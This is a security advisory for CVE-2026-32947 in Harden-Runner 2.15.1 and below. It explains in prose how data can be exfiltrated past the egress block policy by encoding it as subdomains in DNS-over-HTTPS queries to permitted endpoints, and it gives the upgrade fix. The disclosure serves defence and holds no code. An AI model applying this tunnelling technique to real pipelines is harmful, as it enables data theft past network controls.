CVE-2026-32947

Name of the Vulnerable Software and Affected Versions Harden-Runner versions 2.15.1 and below

Description Harden-Runner, a CI/CD security agent functioning as an EDR for GitHub Actions runners, contains a DNS over HTTPS (DoH) issue. This allows attackers to circumvent network restrictions imposed by the egress-policy: block setting by tunneling exfiltrated data through permitted HTTPS endpoints, such as dns.google. The attack involves encoding sensitive data, like the runner's hostname, as subdomains within DoH queries. These queries appear as legitimate HTTPS traffic to Harden-Runner’s domain-based filtering but are ultimately forwarded to a domain controlled by the attacker, enabling data exfiltration without directly connecting to blocked destinations. Exploitation requires pre-existing code execution within the GitHub Actions workflow. The Enterprise Tier of Harden-Runner is not affected.

Recommendations Upgrade to Harden-Runner version 2.16.0 or later.